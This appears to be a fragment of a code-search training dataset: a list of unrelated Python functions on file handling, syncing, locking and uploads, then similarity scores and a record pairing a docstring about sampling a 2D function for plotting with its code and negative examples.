"def add(args):\n files = []\n for path in args.files:\n if os.path.isdir(path):\n ft = filetree(path)\n files.extend(ft.filelist())\n else:\n files.append(path)\n for path in files:\n path = os.path.normpath(os.path.relpath(path, args.base))\n if path not in args.cache:\n args.cache.append(path)\n args.update = True\n return",
"def update_my_ownership(self, add_comp_list):\n all_transfer_event_received = []\n transfer_comp_event = self.msg.get_transfer_cmp_event()\n acc_updater_map_version = self.msg.get_acc_updater_map_version()\n self.msg.load_gl_map()\n while float_comp(acc_updater_map_version, \\\n self.msg.get_acc_updater_map_version()) >= 0:\n time.sleep(20)\n self.logger.info(\"Account updater map version is not updated old\"\\\n \"map version:%s, new map version:%s\" %(acc_updater_map_version,\\\n self.msg.get_acc_updater_map_version()))\n self.msg.load_gl_map()\n\n transfer_comp_event.set()\n self.msg.load_ownership()\n self.updated_comp_list = self.msg.get_ownershipList()\n while not self.check_ownership_updated(add_comp_list):\n time.sleep(20)\n self.msg.load_ownership()\n self.updated_comp_list = self.msg.get_ownershipList()\n\n self.logger.info(\"Updating ownership :%s\" %self.updated_comp_list)\n self.msg.set_ownershipList(self.updated_comp_list)\n\n while len(all_transfer_event_received) != 4:\n all_transfer_event_received.append(self.msg.get_from_Queue())\n transfer_comp_event.clear()\n self.logger.info(\"transfer/accept component event is cleared\")\n add_comp_list = []",
"def sync():\n for filename, requirements in _sync():\n _write_requirements(filename, requirements)",
"def add_mock_dirs(self, dir_list):\n self._mock_dir_list.extend(dir_list)",
"def whitelist_file(self, fkey):\n self.whitelist.update([fkey])",
"def localfiles_for_update(self, localfiles, obsfiles):\n upload_local_files = []\n obs_dict = {}\n for key, mtime, size in obsfiles:\n obs_dict[key.strip('/')] = mtime\n\n for localfile in localfiles:\n filepath, key = localfile\n fullkey = key + '/' + os.path.basename(filepath)\n fullkey = fullkey.strip('/')\n if fullkey in obs_dict.keys():\n localfile_timestamp = os.path.getmtime(filepath)\n obsfile_timestamp = time.mktime(time.strptime(obs_dict[fullkey], \"%Y/%m/%d %H:%M:%S\"))\n\n if localfile_timestamp > obsfile_timestamp:\n upload_local_files.append(localfile)\n else:\n upload_local_files.append(localfile)\n return upload_local_files",
"def svn_fs_access_add_lock_token(*args):\r\n return _fs.svn_fs_access_add_lock_token(*args)",
"def files(self, only_unlocked=False):\n # pylint: disable=no-member\n xdd = builtins.__xonsh_env__.get('XONSH_DATA_DIR')\n xdd = expanduser_abs_path(xdd)\n\n fs = [f for f in glob.iglob(os.path.join(xdd, 'xonsh-*.json'))]\n files = []\n for f in fs:\n try:\n lj = LazyJSON(f, reopen=False)\n if only_unlocked and lj['locked']:\n continue\n # info: closing timestamp, number of commands, filename\n files.append((lj['ts'][1] or time.time(),\n len(lj.sizes['cmds']) - 1,\n f))\n lj.close()\n except (IOError, OSError, ValueError):\n continue\n files.sort()\n return files",
"def addMasters(self,masterNames):\n #--Load Masters\n #--Master FileRefs\n proItems = []\n totSize = 0\n for masterName in masterNames:\n #--Don't have fileRef? FileRef out of date?\n masterInfo = modInfos[masterName]\n fileRefs = masterInfo.extras.get('FileRefs')\n if not fileRefs:\n fileRefs = masterInfo.extras['FileRefs'] = FileRefs(masterInfo,True,True)\n fileRefs.setDebrisIds()\n refreshSize = fileRefs.refreshSize()\n if refreshSize:\n proItems.append((fileRefs,refreshSize))\n totSize += refreshSize\n #--Refresh masters\n cumSize = 0\n for (fileRefs,size) in proItems:\n self.progress.setBaseScale(1.0*cumSize/totSize, 1.0*size/totSize)\n fileRefs.progress = self.progress\n fileRefs.refresh()\n cumSize += size\n #--Do Mapping\n del proItems[:]\n totSize = 0\n for masterName in masterNames:\n size = len(modInfos[masterName].extras['FileRefs'].cells)\n proItems.append((masterName,size))\n totSize += size\n cumSize = 0\n for (masterName,size) in proItems:\n if size: self.progress.setBaseScale(1.0*cumSize/totSize, 1.0*size/totSize)\n self.addMaster(masterName)\n cumSize += size",
"def set_in_files():\r\n\tindatadir = '/nobackup/ejblom/reddit'\r\n\tcom_dir = '/comments'\r\n\tsubm_dir = '/submissions'\r\n\tglob_end = '/filtered*'\r\n\tcom_glob_str = indatadir + com_dir + glob_end\r\n\tsubm_glob_str = indatadir + subm_dir + glob_end\r\n\tinfilenames = sorted(glob.glob(com_glob_str)) + sorted(glob.glob(subm_glob_str))\r\n\treturn infilenames",
"def add_files_and_directories_rename(self, **kwargs):\n self.rename_files_or_directories_objects.append(\n RenameFilesOrDirectories(\n root_directory=self.root_directory,\n exclude_directories=self.exclude_directories,\n exclude_files=self.exclude_files,\n **kwargs\n )\n )",
"def synchronize(self):\n self.increment_pc()\n shares = [self._exchange_shares(player, GF256(0))\n for player in self.players]\n result = gather_shares(shares)\n result.addCallback(lambda _: None)\n return result",
"def wingrep(self):\n for folder, files_ in self.walk():\n listed_files = self.list_appro_files(folder, files_)\n for file_o in self.open_files(listed_files=listed_files):\n self.search_in(file_o)",
"def defineMergeJobs(self, mergeableFiles):\n mergeJobFileSize = 0\n mergeJobEvents = 0\n mergeJobFiles = []\n earliestInsert = 999999999999999\n\n mergeableFiles.sort(key=cmp_to_key(fileCompare))\n\n for mergeableFile in mergeableFiles:\n if mergeableFile[\"file_size\"] > self.maxMergeSize or \\\n mergeableFile[\"file_events\"] > self.maxMergeEvents:\n self.createMergeJob([mergeableFile])\n continue\n elif mergeableFile[\"file_size\"] + mergeJobFileSize > self.maxMergeSize or \\\n mergeableFile[\"file_events\"] + mergeJobEvents > self.maxMergeEvents:\n if mergeJobFileSize > self.minMergeSize or \\\n self.forceMerge == True or \\\n time.time() - mergeableFile['insert_time'] > self.maxWaitTime:\n self.createMergeJob(mergeJobFiles)\n mergeJobFileSize = 0\n mergeJobEvents = 0\n mergeJobFiles = []\n else:\n continue\n\n mergeJobFiles.append(mergeableFile)\n mergeJobFileSize += mergeableFile[\"file_size\"]\n mergeJobEvents += mergeableFile[\"file_events\"]\n if mergeableFile['insert_time'] < earliestInsert:\n earliestInsert = mergeableFile['insert_time']\n\n if mergeJobFileSize > self.minMergeSize or self.forceMerge == True or \\\n time.time() - earliestInsert > self.maxWaitTime:\n if len(mergeJobFiles) > 0:\n self.createMergeJob(mergeJobFiles)\n\n return",
"def populateFileList(self):\n\n self.m_fileList.SetForegroundColour(wx.NullColour)\n\n # We'll need to track which file names are modified and which\n # file names duped.\n applicable, dupes = set(), set()\n\n if not self.m_validPatterns:\n # Regex's don't compile yet, just use the raw filename list.\n newNames = self.m_diskNames\n\n else:\n # Apply the substitution to the filename list to produce a\n # destination-name list, and identify whether the patterns\n # actually affect anything.\n #\n newNames, modifiedIndexes = [], []\n\n matcher = re.compile(self.m_reFromCtl.Value).subn\n subs = self.m_reToCtl.Value\n\n for filename in self.m_diskNames:\n # Perform the sub\n (filename, numChanges) = matcher(subs, filename)\n\n # Was there a modification?\n if numChanges:\n # Record the affected name.\n applicable.add(filename)\n if filename in newNames:\n dupes.add(filename)\n\n # Add to the primary list\n newNames.append(filename)\n\n # Does this produce a different list than we already had? If so,\n # clear the file list and replace it with the new one.\n #\n if newNames != self.m_newNames:\n\n self.m_fileList.Clear()\n\n # Figure out the longest name so we can create a cleanly-formatted\n # set of prefix/suffix characters for the modified/duped annotation.\n #\n maxLen = max(map(len, newNames))\n decorate = '{m} {fn:<{ml}} {m}'.format\n\n # Now build a list of display elements.\n for filename in newNames:\n mark = ' ' if filename not in applicable else '|'\n if filename in dupes:\n mark = '*'\n self.m_fileList.Append(decorate(m=mark, fn=filename, ml=maxLen))\n\n # Keep the list.\n self.m_newNames[:] = newNames\n\n # Update the apply button, we only want it enabled when the user\n # has a valid set of patterns that affect any files and have no\n # dupes produced as a result.\n #\n self.m_applyBtn.Enabled = bool(applicable) and not dupes\n\n if dupes:\n # Emphasize the presence of dupes.\n self.m_fileList.SetForegroundColour(wx.RED)\n\n # Draw the list.\n self.m_fileList.Refresh()",
"def filter_filelist(files: list, hour_mod: int = 12, min_mod: int = 60) -> list:\n files_restricted = []\n if hour_mod == 0 and min_mod == 0:\n files_restricted.append(sorted(files)[-1])\n else:\n for file in files:\n hour = int(file.split(\"_\")[3][8:10])\n minute = int(file.split(\"_\")[3][10:12])\n if hour % hour_mod == 0 and minute % min_mod == 0:\n files_restricted.append(file)\n logging.debug(f'Remote file added: {file}')\n else:\n logging.debug(f'Remote file ignored: {file}')\n logging.info('Files to be downloaded has been reduced from {} to {}'.format(len(files), len(files_restricted)))\n return files_restricted",
"def git_callback(files): # type: (t.List[t.Tuple[str, str]]) -> None\n for dirpath, _dirnames, filenames in os.walk(os.path.join(data_context().content.root, '.git')):\n paths = [os.path.join(dirpath, filename) for filename in filenames]\n files.extend((path, os.path.relpath(path, data_context().content.root)) for path in paths)",
"def _haveReadLocks(self): \n readLockFileName = ReadLock.fileName\n for name in os.listdir(self.dir):\n if name.startswith(readLockFileName):\n return True\n return False",
"def merge_files():\n # abs path of data folder\n work_folder = os.path.join(CURRENT_FOLDER, \"..\\\\Data\\\\weather_data\\\\KORD\")\n file_list = os.listdir(work_folder)\n with open(os.path.join(work_folder, \"..\\\\merged_history_KORD.csv\"), \"w\") as outfile:\n for line in open(os.path.join(work_folder, file_list[0])):\n outfile.write(line)\n print \"write the first line\"\n for i in range(1, len(file_list)):\n with open(os.path.join(work_folder, file_list[i])) as infile:\n infile.next()\n for line in infile:\n outfile.write(line)",
"def write_cache_file_list(self, file_list=None):\n if file_list:\n self.add_filelist_to_cache(file_list)\n cache_list = []\n for finfo in self.cache_file_list_dict.values():\n cache_list.append(finfo.output_cache_tuple())\n return self.write_pickle_object_to_file(tuple(cache_list))",
"def setfiles(self, filelist):\r\n self._filelist=filelist\r\n self._energy=self.readenergy(filelist)",
"def upload(self, folder_list, files):\n current_folder_id = self.top_folder_id\n for fname in folder_list:\n current_folder_id = self._fetch_or_create_folder(fname, current_folder_id)\n for file in files:\n self._upload_detail(file, current_folder_id)",
"def main(root, filelist):\n #print \"got %s: %s\" % (root, filelist)\n rename(root, filelist)",
"def getLockInfoOfNonDerivedFiles(self, ids, wspLockId):\n sql = \"\"\"\n SELECT cdb_file.cdb_lock,\n cdb_file.cdb_lock_id,\n cdb_file.cdbf_object_id,\n cdb_file.cdb_object_id,\n angestellter.name AS mapped_cdb_lock_name\n FROM\n cdb_file\n LEFT JOIN\n angestellter\n ON\n cdb_file.cdb_lock = angestellter.personalnummer\n WHERE\n cdb_file.cdb_classname = 'cdb_file'\n AND (cdb_file.cdb_belongsto='' OR cdb_file.cdb_belongsto IS NULL)\n \"\"\"\n records = partionedSqlQuery(sql, \"cdb_file.cdbf_object_id\", ids)\n res = defaultdict(dict)\n for r in records:\n status = u\"not\"\n lockerName = u\"\"\n locker = r.cdb_lock\n if locker:\n lockerName = r.mapped_cdb_lock_name\n if lockerName is None:\n misc.cdblogv(misc.kLogMsg, 0,\n \"WsObjectCache, warning: file '%s' of document '%s' is locked\"\n \" by unknown user '%s' (no matching name in 'angestellter')\"\n % (r.cdb_object_id, r.cdbf_object_id, locker))\n lockerName = u\"\"\n if locker == auth.persno:\n status = u\"self\"\n lockId = r.cdb_lock_id\n if lockId and wspLockId:\n if lockId != wspLockId:\n status = u\"other_ws\"\n else:\n status = u\"other\"\n res[r.cdbf_object_id][r.cdb_object_id] = {'status': status, 'locker': lockerName}\n return res",
"def sync():\n _ownered_project = []\n _tmp_project_list = get_user_repo_list(current_user.username)\n if _tmp_project_list:\n for project in _tmp_project_list:\n _ownered_project.append((project, project))\n # Add upperstream_repo\n upperstream_repo = get_upperstream_repo(project)\n if upperstream_repo is not None:\n _ownered_project.append((upperstream_repo, upperstream_repo + \"(Upperstream of %s)\" % project))\n\n User.objects(username=current_user.username).update_one(set__owned_repo_sync_time=datetime.utcnow())\n\n # mongoDB don't support key value contains '.'\n for i in range(len(_ownered_project)):\n _ownered_project[i] = (_ownered_project[i][0].replace('.', '[dot]'), _ownered_project[i][1])\n User.objects(username=current_user.username).update_one(set__owned_repo=dict(_ownered_project))\n\n flash('Refresh your own GitHub repositories list successfully!', 'success')\n return redirect(url_for('main.load_from_github'))",
"def _rnlst(self, path, filelist):\n path = self._cleanpath(path)\n dirdict = self.parsedir(path)\n print(dirdict)\n \n trycwds = dirdict.get('trycwds', [])\n names = dirdict.get('names', [])\n \n for trycwd, name in zip(trycwds, names): \n if trycwd: # name is a directory\n self._rnlst(self.remotepathsep.join([path, name]), filelist)\n else: \n filelist.append(self.remotepathsep.join([path, name]))\n \n return filelist",
"def sync_ready_files(self, sync_config=None):\n\n if sync_config is None:\n sync_config = config.getSettingJson(config.CONSENT_SYNC_BUCKETS)\n\n hpos_sync_config = sync_config['hpos']\n orgs_sync_config = sync_config['orgs']\n\n filters = {\n hpo_name: {\n 'exclude_types': [\n ConsentType(excluded_type_str) for excluded_type_str in options['exclude_types']\n ]\n }\n for hpo_name, options in hpos_sync_config.items()\n if 'exclude_types' in options\n }\n file_list: List[ConsentFile] = self.consent_dao.get_files_ready_to_sync(\n hpo_names=hpos_sync_config.keys(),\n org_names=orgs_sync_config.keys(),\n additional_filters=filters\n )\n\n pairing_info_map = self._build_participant_pairing_map(file_list)\n\n # Build out a FileSync for each possible PairingInfo\n sync_pairing_map: Dict[ParticipantPairingInfo, BaseFileSync] = {}\n for pairing_info in pairing_info_map.values():\n if pairing_info not in sync_pairing_map:\n org_config = orgs_sync_config.get(pairing_info.org_name)\n if org_config:\n config_data = org_config\n else:\n config_data = hpos_sync_config.get(pairing_info.hpo_name)\n\n if not config_data:\n # No need to build sync handlers for anything not in the config\n continue\n\n sync_pairing_map[pairing_info] = self._build_sync_handler(\n zip_files=config_data['zip_consents'],\n bucket=config_data['bucket'],\n pairing_info=pairing_info\n )\n\n for file in file_list:\n pairing_info = pairing_info_map.get(file.participant_id, None)\n if not pairing_info:\n # Skip files for unpaired participants\n continue\n\n # Retrieve the sync handler based on the pairing information\n file_group = sync_pairing_map.get(pairing_info)\n if not file_group:\n # Ignore participants paired to an org or hpo we aren't syncing files for\n continue\n\n file_group.files_to_sync.append(file)\n\n with self.consent_dao.session() as session:\n for file_group in sync_pairing_map.values():\n files_synced = file_group.sync_file_list()\n\n # Update the database after each group syncs so ones\n # that have succeeded so far get saved if a later one fails\n if len(files_synced):\n self.consent_dao.batch_update_consent_files(session=session, consent_files=files_synced)\n session.commit()\n\n # Queue tasks to rebuild consent metrics resource data records (for PDR)\n dispatch_rebuild_consent_metrics_tasks([file.id for file in files_synced])",
"def files_distribute(self):\n self._post('files/distribute')",
"def merge_lock(poetry: Poetry) -> None:\n lock_data = load(poetry.locker)\n save(poetry.locker, lock_data, poetry.package)",
"def _replace_files(self, index_key, media_key, new_list, fundamentals):\n _index=fundamentals.get(index_key, {})\n _media=fundamentals.get(media_key, {})\n for _file in new_list:\n _data=self._item_from_index(_file, 'data', _media)\n if not _data:\n self.log('Failed to write file %s due to no data'%_file)\n continue\n _file_name=self._item_from_index(_file, 'filename', _index)\n if _file_name:\n _stat=self.statfile(_file_name)\n if _stat and _stat['size']!=len(_data):\n try:\n self.writefile(_file_name, _data)\n except:\n self.log('Failed to write BREW file '+_file_name)\n if __debug__:\n raise",
"def blocking_transfer(self, filelist):\n miscutils.fwdebug_print(\"\\tNumber files to transfer: %d\" % len(filelist))\n if miscutils.fwdebug_check(1, \"ARCHIVETRANSFER_DEBUG\"):\n miscutils.fwdebug_print(\"\\tfilelist: %s\" % filelist)\n\n srcroot = self.src_archive_info['root']\n dstroot = self.dst_archive_info['root']\n\n files2copy = copy.deepcopy(filelist)\n for _, finfo in files2copy.items():\n finfo['src'] = '%s/%s' % (srcroot, finfo['src'])\n finfo['dst'] = '%s/%s' % (dstroot, finfo['dst'])\n\n transresults = disk_utils_local.copyfiles(files2copy, None)\n\n return transresults",
"def _lock(self):\n self._lockFile = open(self._lockFilename, \"w\")\n self._lockFile.write(\"%d\" % (os.getpid()))\n self._lockFile.flush()",
"def prepare_list_of_files(kernel_name, kernel_file_list, params, grid, threads, block_size_names):\n temp_files = dict()\n\n kernel_string = get_kernel_string(kernel_file_list[0], params)\n name, kernel_string = prepare_kernel_string(kernel_name, kernel_string, params, grid, threads, block_size_names)\n\n if len(kernel_file_list) > 1:\n for f in kernel_file_list[1:]:\n #generate temp filename with the same extension\n temp_file = get_temp_filename(suffix=\".\" + f.split(\".\")[-1])\n temp_files[f] = temp_file\n #add preprocessor statements to the additional file\n _, temp_file_string = prepare_kernel_string(kernel_name, get_kernel_string(f, params), params, grid, threads, block_size_names)\n write_file(temp_file, temp_file_string)\n #replace occurences of the additional file's name in the first kernel_string with the name of the temp file\n kernel_string = kernel_string.replace(f, temp_file)\n\n return name, kernel_string, temp_files",
"def create_lock_file():\n\n print(\"Creating lock file\")",
"def add_files_to_zip(\n file_list, common_root_directory, zip_handler, put_all_files_in_shared_root_dir\n):\n for file_path in file_list:\n rel_path = file_path\n if common_root_directory is not None:\n rel_path = os.path.relpath(file_path, common_root_directory)\n else:\n # If we don't have a common root dir then, on Windows, path will begin with drive letter\n # e.g. 'C:\\' - remove this for adding to the ZIP\n if platform.system() == \"Windows\":\n rel_path = rel_path.replace(\":\", \"\")\n try:\n if put_all_files_in_shared_root_dir and common_root_directory is not None:\n zip_handler.write(\n file_path,\n arcname=os.path.join(os.path.basename(common_root_directory), rel_path),\n )\n else:\n zip_handler.write(file_path, arcname=rel_path)\n except IOError:\n printer(\n \"'{}' no longer present in folder - zip creation aborted\".format(file_path),\n \"error\",\n True,\n )\n raise\n except OSError:\n printer(\"OSError on '{}' - zip creation aborted\".format(file_path), \"error\", True)\n raise",
"def _add_manifest_files(zip_file, dir_name, payload_info_list, tag_info_list):\n for checksum_algorithm in _get_checksum_algorithm_set(payload_info_list):\n _add_tag_file(\n zip_file,\n dir_name,\n tag_info_list,\n _gen_manifest_file_tup(payload_info_list, checksum_algorithm),\n )",
"def upload_files(self, files):\n\n for f in files:\n self.scp.put(f, recursive=True)",
"def process_files(exp_folders):\n pool = mp.Pool()\n results = pool.imap_unordered(read_and_serialize, exp_folders)\n\n stat = []\n for res in results:\n print(res)\n stat.append(res)\n\n pool.close()\n pool.join()",
"def syncfolder():",
"def loadInputFiles(self):\n\t\tfor filename in self.input_filename_list:\n\t\t\tfor module in self.modules:\n\t\t\t\tmodule.Add(filename)",
"def add_files(self):\n file_paths = tkinter.filedialog.askopenfilenames(parent=self)\n\n if not file_paths:\n return\n for file_path in file_paths:\n self.files_treeview.insert(\"\", \"end\", values=(file_path,))\n self.files_treeview.selection_set(self.files_treeview.get_children()[-1])",
"def createFileList(self):\r\n if self.childFileListDownload is None or not self.childFileListDownload.is_alive():\r\n self.childFileListDownload = multiprocessing.Process(target=self.createFileListHTTP, args=(self.server, self.directory))\r\n self.childFileListDownload.start()"
] | [
"0.5858453",
"0.5857905",
"0.5442941",
"0.5427439",
"0.5369485",
"0.534254",
"0.5242692",
"0.5233011",
"0.52133423",
"0.51889026",
"0.51700175",
"0.51625514",
"0.5118121",
"0.5110031",
"0.50916535",
"0.5077471",
"0.5056525",
"0.5047517",
"0.50415224",
"0.50407803",
"0.50310415",
"0.50032467",
"0.49873388",
"0.49867135",
"0.49853197",
"0.49367034",
"0.49278733",
"0.49048927",
"0.48945892",
"0.48774955",
"0.48757705",
"0.4868424",
"0.48330647",
"0.48270535",
"0.48059884",
"0.4800957",
"0.47996476",
"0.47986957",
"0.47923377",
"0.4784794",
"0.4770063",
"0.4757243",
"0.4756429",
"0.4740982",
"0.4740402",
"0.47184512",
"0.47064188",
"0.4701494",
"0.46890834",
"0.4686908",
"0.46833098",
"0.46705067",
"0.46669143",
"0.4660952",
"0.46540475",
"0.46505398",
"0.4643907",
"0.46393213",
"0.46392995",
"0.4629129",
"0.46290788",
"0.46219367",
"0.4620757",
"0.46154115",
"0.46036127",
"0.45879766",
"0.4587104",
"0.45858932",
"0.45855638",
"0.45670807",
"0.4564829",
"0.45554876",
"0.45554143",
"0.45544338",
"0.45447424",
"0.45409322",
"0.45369944",
"0.45357588",
"0.4534035",
"0.45301998",
"0.45283294",
"0.45270038",
"0.45166636",
"0.45147595",
"0.4512996",
"0.45063812",
"0.45049688",
"0.45010754",
"0.45004067",
"0.44998848",
"0.4498591",
"0.44961262",
"0.44917104",
"0.44913235",
"0.44774613",
"0.447644",
"0.44691503",
"0.44686478",
"0.4458599",
"0.44559982"
] | 0.785469 | 0 |
x.__init__(...) initializes x; see help(type(x)) for signature | def __init__(self, *more): # real signature unknown; restored from __doc__
pass | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def x_init(self):\n pass",
"def init(self, *args, **kwds):\n pass",
"def __init__(self, x=None, y=None):\n if y is None:\n if x is None:\n object.__setattr__(self, 'x', 0)\n object.__setattr__(self, 'y', 0)\n else:\n object.__setattr__(self, 'x', x[0])\n object.__setattr__(self, 'y', x[1])\n else:\n object.__setattr__(self, 'x', x)\n object.__setattr__(self, 'y', y)",
"def __init__(self, xstart, **more_args):\r\n self.xstart = xstart\r\n self.more_args = more_args\r\n self.initialize()",
"def __init__(self, x=None):\n # Unpack the parameters or use default values.\n if x is None:\n self.nt_probs = np.ones(4) / 4\n self.kappa = 2.0\n self.penalty = 0\n else:\n info = self._unpack_params(x)\n self.nt_probs, self.kappa, self.penalty = info\n\n # Mark some downstream attributes as not initialized.\n self._invalidate()",
"def __init__(self, x=0, y=0, z=0):\n if type(x) is tuple:\n self.x = x[0]\n self.y = x[1]\n self.z = x[2]\n elif type(x) is vector:\n self.x = x.x\n self.y = x.y\n self.z = x.z\n else:\n self.x = x\n self.y = y\n self.z = z",
"def initialize(self, *args, **kwargs):",
"def __init__(self, *args, **kwargs): # real signature unknown\n pass",
"def __init__(self, *args, **kwargs): # real signature unknown\n pass",
"def __init__(self, *args, **kwargs): # real signature unknown\n pass",
"def __init__(self, *args, **kwargs): # real signature unknown; restored from __doc__\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args):\r\n pass",
"def __init__(self, *args, **kwargs) -> None:\n pass",
"def __init__(self, *args, **kwargs) -> None:\n pass",
"def __init__(self, x=None):\r\n self.v = x\r\n self.cl = None\r\n self.cr = None\r\n return None",
"def initialize(self, *args, **kwargs):\n pass",
"def initialize_(x, spec):\n activate(x, spec, lookup=[nn.init])",
"def __init__(self, **kwds):\n raise NotImplementedError",
"def __init__ (self):\n self.x = 10",
"def __init__(self, initX, initY):\n self.x = initX\n self.y = initY",
"def __init__(self, initX, initY):\n self.x = initX\n self.y = initY",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(*args):",
"def __init__(self, gamma=None, x0=None):\n if gamma is not None and x0 is not None:\n self._initialize(gamma, x0)",
"def initialize(self, **kwargs):",
"def __init__(self, *args):\n pass",
"def __init__():",
"def initialize(cls):",
"def init(self) -> None:"
] | [
"0.7523401",
"0.75223213",
"0.71459436",
"0.7083094",
"0.7015502",
"0.68367285",
"0.6812456",
"0.6742144",
"0.6742144",
"0.6742144",
"0.67186326",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67170554",
"0.67132217",
"0.67132217",
"0.6712598",
"0.6707006",
"0.6696875",
"0.66729563",
"0.6666136",
"0.663887",
"0.663887",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.66352445",
"0.6597404",
"0.65855956",
"0.65846837",
"0.6584464",
"0.6577272",
"0.6575179"
] | 0.6569203 | 96 |
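A minimal usage sketch for the sample2d helper documented in the next record, assuming SymPy, NumPy and matplotlib are installed and that sample2d is importable from the module the record's snippet was extracted from; the symbol name, the function x**2 and the interval (-3, 3, 60) are illustrative choices, not values taken from the dataset.

import matplotlib.pyplot as plt
from sympy import Symbol

# sample2d is assumed to be importable from the module the snippet below comes from.
x = Symbol('x')
# Sample f(x) = x**2 on [-3, 3] with 60 subintervals; sample2d returns plain
# NumPy arrays, so the result can be passed straight to matplotlib.
X, Y = sample2d(x**2, (x, -3, 3, 60))
plt.plot(X, Y)
plt.show()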
r""" Samples a 2d function f over specified intervals and returns two arrays (X, Y) suitable for plotting with matlab (matplotlib) syntax. See examples\mplot2d.py. f is a function of one variable, such as x2. x_args is an interval given in the form (var, min, max, n) | def sample2d(f, x_args):
try:
f = sympify(f)
except SympifyError:
raise ValueError("f could not be interpreted as a SymPy function")
try:
x, x_min, x_max, x_n = x_args
except (TypeError, IndexError):
raise ValueError("x_args must be a tuple of the form (var, min, max, n)")
x_l = float(x_max - x_min)
x_d = x_l/float(x_n)
X = np.arange(float(x_min), float(x_max) + x_d, x_d)
Y = np.empty(len(X))
for i in range(len(X)):
try:
Y[i] = float(f.subs(x, X[i]))
except TypeError:
Y[i] = None
return X, Y | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def sample3d(f, x_args, y_args):\n x, x_min, x_max, x_n = None, None, None, None\n y, y_min, y_max, y_n = None, None, None, None\n try:\n f = sympify(f)\n except SympifyError:\n raise ValueError(\"f could not be interpreted as a SymPy function\")\n try:\n x, x_min, x_max, x_n = x_args\n y, y_min, y_max, y_n = y_args\n except (TypeError, IndexError):\n raise ValueError(\"x_args and y_args must be tuples of the form (var, min, max, intervals)\")\n\n x_l = float(x_max - x_min)\n x_d = x_l/float(x_n)\n x_a = np.arange(float(x_min), float(x_max) + x_d, x_d)\n\n y_l = float(y_max - y_min)\n y_d = y_l/float(y_n)\n y_a = np.arange(float(y_min), float(y_max) + y_d, y_d)\n\n def meshgrid(x, y):\n \"\"\"\n Taken from matplotlib.mlab.meshgrid.\n \"\"\"\n x = np.array(x)\n y = np.array(y)\n numRows, numCols = len(y), len(x)\n x.shape = 1, numCols\n X = np.repeat(x, numRows, 0)\n\n y.shape = numRows, 1\n Y = np.repeat(y, numCols, 1)\n return X, Y\n\n X, Y = np.meshgrid(x_a, y_a)\n\n Z = np.ndarray((len(X), len(X[0])))\n for j in range(len(X)):\n for k in range(len(X[0])):\n try:\n Z[j][k] = float(f.subs(x, X[j][k]).subs(y, Y[j][k]))\n except (TypeError, NotImplementedError):\n Z[j][k] = 0\n return X, Y, Z",
"def fcontourf(f, x1range, x2range, yrange, **kwargs):\n x1s = np.linspace(x1range[0], x1range[1])\n x2s = np.linspace(x2range[0], x2range[1])\n ys = np.linspace(yrange[0], yrange[1], 20)\n fs = [[f(np.array([x1,x2])) for x1 in x1s] for x2 in x2s]\n plt.contourf(x1s, x2s, fs, ys, **kwargs)\n plt.axis('scaled')",
"def show_trace_2d(f, results):\n plt.close()\n # draw input points\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n # get the field of figure\n x1, x2 = np.meshgrid(np.arange(-5.5, 1.0, 0.1), np.arange(-3.0, 1.0, 0.1))\n # draw the contour of function using x1,x2 as step\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')\n plt.ylabel('x2')\n plt.show()",
"def show_trace_2d(f, results): #@save\n set_figsize()\n plt.plot(*zip(*results), '-o', color='#ff7f0e')\n x1, x2 = torch.meshgrid(torch.arange(-5.5, 1.0, 0.1),torch.arange(-3.0, 1.0, 0.1))\n plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n plt.xlabel('x1')",
"def test_exercise_1():\n a, b = 5, 0\n fvals = []\n grid = np.linspace(-3, 4)\n for value in grid:\n fvals.append(get_test_function(value, a, b))\n plt.plot(grid, fvals)",
"def show_trace_2d(f, results): #@save\n d2l.set_figsize()\n d2l.plt.plot(*zip(*results), '-o', color='#ff7f0e')\n x1, x2 = d2l.meshgrid(d2l.arange(-5.5, 1.0, 0.1),\n d2l.arange(-3.0, 1.0, 0.1))\n d2l.plt.contour(x1, x2, f(x1, x2), colors='#1f77b4')\n d2l.plt.xlabel('x1')\n d2l.plt.ylabel('x2')",
"def display(f, x_min, x_max, delta=0.001):\n x = list(drange(x_min, x_max,delta))\n y = [f(i) for i in x]\n plt.title(f.__name__)\n plt.grid(True)\n plt.xlabel('X')\n plt.ylabel('Y= '+f.__name__ + '(X)')\n plt.plot(x,y, 'r')\n plt.show()",
"def sampleFunction2(x2: int, y2: float) -> float:\n return x2 * y2",
